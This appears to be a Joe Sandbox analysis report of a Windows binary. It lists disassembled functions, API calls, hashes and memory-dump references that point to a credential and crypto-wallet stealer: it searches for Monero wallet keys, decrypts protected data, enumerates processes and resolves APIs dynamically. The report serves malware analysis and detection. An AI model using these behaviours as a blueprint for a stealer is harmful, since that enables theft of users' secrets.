API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 69d6d6a7e39aab3010c452d2ac5c01acaa8fcac17506f81fef09a286ebf27e4b
Instruction ID: 9bb9bdab58a2d29e1ec6586e9f1d2d1cb8966d9e37026b7a3b139fe3010c0be4
Opcode Fuzzy Hash: 69d6d6a7e39aab3010c452d2ac5c01acaa8fcac17506f81fef09a286ebf27e4b
Instruction Fuzzy Hash: 24414C71A40218ABDB24DB94DC99BEEB7B8FF44700F2041D9E10966291DB346F89CFA1

Function 000AE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,000C0D73), ref: 000AE4A2
StrCmpCA.SHLWAPI(?,000C14F8), ref: 000AE4F2
StrCmpCA.SHLWAPI(?,000C14FC), ref: 000AE508
FindNextFileA.KERNEL32(000000FF,?), ref: 000AEBDF

Strings

\*.*, xrefs: 000AE44D

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 0f8b1eb5bf08ead65b93d903c0abd7b67d464db0c5c19d1293178e6d4cd48c0a
Instruction ID: 5501e4d24a971efc17cae787089c817b04a4c803b1798c344c8761835878a679
Opcode Fuzzy Hash: 0f8b1eb5bf08ead65b93d903c0abd7b67d464db0c5c19d1293178e6d4cd48c0a
Instruction Fuzzy Hash: B7122571A10118BADB24FB70DCA6EED7378AF56300F404599B50A96593EF306F49CFA2

Function 000B9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000B961E
Process32First.KERNEL32(000C0ACA,00000128), ref: 000B9632
Process32Next.KERNEL32(000C0ACA,00000128), ref: 000B9647
StrCmpCA.SHLWAPI(?,00000000), ref: 000B965C
CloseHandle.KERNEL32(000C0ACA), ref: 000B967A

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 1ce0a7e6934f1a9ba86e22d63310c00d6b3453a0830f494d46b99efb5c4e540a
Instruction ID: 46ced80144dec17902cad7f7661905120b7b1c87519ac81a9aa1759aed8d9bcd
Opcode Fuzzy Hash: 1ce0a7e6934f1a9ba86e22d63310c00d6b3453a0830f494d46b99efb5c4e540a
Instruction Fuzzy Hash: F5011EB5A40208EBDB24DFA5DD88BEDBBF8FB48300F104188A90A97240D734AF40CF51

Function 000B7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0139EA90,00000000,?,000C0E10,00000000,?,00000000,00000000), ref: 000B7A63
RtlAllocateHeap.NTDLL(00000000), ref: 000B7A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0139EA90,00000000,?,000C0E10,00000000,?,00000000,00000000,?), ref: 000B7A7D
wsprintfA.USER32 ref: 000B7AB7

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: d6163067c65440800a87aa18c9d5badb66b918da4825a03dfe860ab1a9128bc2
Instruction ID: 04ba123cc7d30f65e42494fb517072aa1c6a38c52504d35e3efa14cfe287974c
Opcode Fuzzy Hash: d6163067c65440800a87aa18c9d5badb66b918da4825a03dfe860ab1a9128bc2
Instruction Fuzzy Hash: 8A118EB1945218EBEB20CF54DC49FA9BBB8FB44721F10439AEA0A972C0D7742A40CF52

Function 000A9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000A9B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 000A9BA3
LocalFree.KERNEL32(?), ref: 000A9BD3

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: c89c7d13d7adab07018698fc77285342a739ce50d1a868365b0f54aafd281bd7
Instruction ID: 2809a513696d177d4b3111c536802a059290dcc449b1739ffc14e31fcab9b502
Opcode Fuzzy Hash: c89c7d13d7adab07018698fc77285342a739ce50d1a868365b0f54aafd281bd7
Instruction Fuzzy Hash: 4011B7B8A00209EFDB04DF94D989AAEB7F5FF89304F104598E915AB350D774AE50CFA1

Function 000B7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000A11B7), ref: 000B7880
RtlAllocateHeap.NTDLL(00000000), ref: 000B7887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 000B789F

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: b0ce6a183daff1693f96b311e388f4cb95a6a69b0fe02abeb33d15f7154c346f
Instruction ID: 084d1d88a9cc550d82a44fe1496680196a7ec47868560030c3ce744a132f3863
Opcode Fuzzy Hash: b0ce6a183daff1693f96b311e388f4cb95a6a69b0fe02abeb33d15f7154c346f
Instruction Fuzzy Hash: 51F04FB1944248EBCB10DF98DD89FAEFBB8EB04711F10025AFA05A6680C77425048BA2

Function 000A1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 000A116A
ExitProcess.KERNEL32 ref: 000A117E

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: c9d75738831b5b6551ba47ee1e94dbb1da30b0fdf4af3bd276bdf2fe31249794
Instruction ID: f58f4b6ad81aa2af7ffd2d7ece3283d1ad8e1ddbce96f076ad5e36a3c8b93168
Opcode Fuzzy Hash: c9d75738831b5b6551ba47ee1e94dbb1da30b0fdf4af3bd276bdf2fe31249794
Instruction Fuzzy Hash: C1D05E7494030CDBCB00DFE0E88D6DDBB78FB08312F000554E90562340EA306481CAA6

Function 000B9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,013868A0), ref: 000B9C2D
GetProcAddress.KERNEL32(75900000,01386720), ref: 000B9C45
GetProcAddress.KERNEL32(75900000,01398EF8), ref: 000B9C5E
GetProcAddress.KERNEL32(75900000,01398F28), ref: 000B9C76
GetProcAddress.KERNEL32(75900000,0139DF68), ref: 000B9C8E
GetProcAddress.KERNEL32(75900000,0139DE60), ref: 000B9CA7
GetProcAddress.KERNEL32(75900000,0138B270), ref: 000B9CBF
GetProcAddress.KERNEL32(75900000,0139DF20), ref: 000B9CD7
GetProcAddress.KERNEL32(75900000,0139DED8), ref: 000B9CF0
GetProcAddress.KERNEL32(75900000,0139DEC0), ref: 000B9D08
GetProcAddress.KERNEL32(75900000,0139DFC8), ref: 000B9D20
GetProcAddress.KERNEL32(75900000,01386820), ref: 000B9D39
GetProcAddress.KERNEL32(75900000,013867A0), ref: 000B9D51
GetProcAddress.KERNEL32(75900000,01386740), ref: 000B9D69
GetProcAddress.KERNEL32(75900000,01386760), ref: 000B9D82
GetProcAddress.KERNEL32(75900000,0139DE48), ref: 000B9D9A
GetProcAddress.KERNEL32(75900000,0139DF38), ref: 000B9DB2
GetProcAddress.KERNEL32(75900000,0138B310), ref: 000B9DCB
GetProcAddress.KERNEL32(75900000,013867C0), ref: 000B9DE3
GetProcAddress.KERNEL32(75900000,0139DF50), ref: 000B9DFB
GetProcAddress.KERNEL32(75900000,0139DE90), ref: 000B9E14
GetProcAddress.KERNEL32(75900000,0139DF80), ref: 000B9E2C
GetProcAddress.KERNEL32(75900000,0139DF98), ref: 000B9E44
GetProcAddress.KERNEL32(75900000,013868E0), ref: 000B9E5D
GetProcAddress.KERNEL32(75900000,0139DFB0), ref: 000B9E75
GetProcAddress.KERNEL32(75900000,0139DF08), ref: 000B9E8D
GetProcAddress.KERNEL32(75900000,0139DEF0), ref: 000B9EA6
GetProcAddress.KERNEL32(75900000,0139DFE0), ref: 000B9EBE
GetProcAddress.KERNEL32(75900000,0139DE78), ref: 000B9ED6
GetProcAddress.KERNEL32(75900000,0139DE30), ref: 000B9EEF
GetProcAddress.KERNEL32(75900000,0139DEA8), ref: 000B9F07
GetProcAddress.KERNEL32(75900000,0139DA40), ref: 000B9F1F
GetProcAddress.KERNEL32(75900000,0139DA28), ref: 000B9F38
GetProcAddress.KERNEL32(75900000,01399A68), ref: 000B9F50
GetProcAddress.KERNEL32(75900000,0139D9B0), ref: 000B9F68
GetProcAddress.KERNEL32(75900000,0139D998), ref: 000B9F81
GetProcAddress.KERNEL32(75900000,013868C0), ref: 000B9F99
GetProcAddress.KERNEL32(75900000,0139DA10), ref: 000B9FB1
GetProcAddress.KERNEL32(75900000,01386940), ref: 000B9FCA
GetProcAddress.KERNEL32(75900000,0139DAA0), ref: 000B9FE2
GetProcAddress.KERNEL32(75900000,0139D938), ref: 000B9FFA
GetProcAddress.KERNEL32(75900000,013864C0), ref: 000BA013
GetProcAddress.KERNEL32(75900000,01386360), ref: 000BA02B
LoadLibraryA.KERNEL32(0139D920,?,000B5CA3,000C0AEB,?,?,?,?,?,?,?,?,?,?,000C0AEA,000C0AE3), ref: 000BA03D
LoadLibraryA.KERNEL32(0139D9F8,?,000B5CA3,000C0AEB,?,?,?,?,?,?,?,?,?,?,000C0AEA,000C0AE3), ref: 000BA04E
LoadLibraryA.KERNEL32(0139D878,?,000B5CA3,000C0AEB,?,?,?,?,?,?,?,?,?,?,000C0AEA,000C0AE3), ref: 000BA060
LoadLibraryA.KERNEL32(0139DA58,?,000B5CA3,000C0AEB,?,?,?,?,?,?,?,?,?,?,000C0AEA,000C0AE3), ref: 000BA072
LoadLibraryA.KERNEL32(0139D950,?,000B5CA3,000C0AEB,?,?,?,?,?,?,?,?,?,?,000C0AEA,000C0AE3), ref: 000BA083
LoadLibraryA.KERNEL32(0139D830,?,000B5CA3,000C0AEB,?,?,?,?,?,?,?,?,?,?,000C0AEA,000C0AE3), ref: 000BA095
LoadLibraryA.KERNEL32(0139DAB8,?,000B5CA3,000C0AEB,?,?,?,?,?,?,?,?,?,?,000C0AEA,000C0AE3), ref: 000BA0A7
LoadLibraryA.KERNEL32(0139DA88,?,000B5CA3,000C0AEB,?,?,?,?,?,?,?,?,?,?,000C0AEA,000C0AE3), ref: 000BA0B8
GetProcAddress.KERNEL32(75FD0000,01386460), ref: 000BA0DA
GetProcAddress.KERNEL32(75FD0000,0139D8C0), ref: 000BA0F2
GetProcAddress.KERNEL32(75FD0000,01398970), ref: 000BA10A
GetProcAddress.KERNEL32(75FD0000,0139DA70), ref: 000BA123
GetProcAddress.KERNEL32(75FD0000,01386420), ref: 000BA13B
GetProcAddress.KERNEL32(734B0000,0138AFA0), ref: 000BA160
GetProcAddress.KERNEL32(734B0000,013864A0), ref: 000BA179
GetProcAddress.KERNEL32(734B0000,0138B248), ref: 000BA191
GetProcAddress.KERNEL32(734B0000,0139DAD0), ref: 000BA1A9
GetProcAddress.KERNEL32(734B0000,0139DAE8), ref: 000BA1C2
GetProcAddress.KERNEL32(734B0000,01386600), ref: 000BA1DA
GetProcAddress.KERNEL32(734B0000,013865E0), ref: 000BA1F2
GetProcAddress.KERNEL32(734B0000,0139D890), ref: 000BA20B
GetProcAddress.KERNEL32(763B0000,013863E0), ref: 000BA22C
GetProcAddress.KERNEL32(763B0000,01386660), ref: 000BA244
GetProcAddress.KERNEL32(763B0000,0139D860), ref: 000BA25D
GetProcAddress.KERNEL32(763B0000,0139DB00), ref: 000BA275
GetProcAddress.KERNEL32(763B0000,01386500), ref: 000BA28D
GetProcAddress.KERNEL32(750F0000,0138B040), ref: 000BA2B3
GetProcAddress.KERNEL32(750F0000,0138AFC8), ref: 000BA2CB
GetProcAddress.KERNEL32(750F0000,0139D908), ref: 000BA2E3
GetProcAddress.KERNEL32(750F0000,013862A0), ref: 000BA2FC
GetProcAddress.KERNEL32(750F0000,01386440), ref: 000BA314
GetProcAddress.KERNEL32(750F0000,0138B180), ref: 000BA32C
GetProcAddress.KERNEL32(75A50000,0139DB18), ref: 000BA352
GetProcAddress.KERNEL32(75A50000,01386300), ref: 000BA36A
GetProcAddress.KERNEL32(75A50000,01398980), ref: 000BA382
GetProcAddress.KERNEL32(75A50000,0139D8D8), ref: 000BA39B
GetProcAddress.KERNEL32(75A50000,0139D848), ref: 000BA3B3
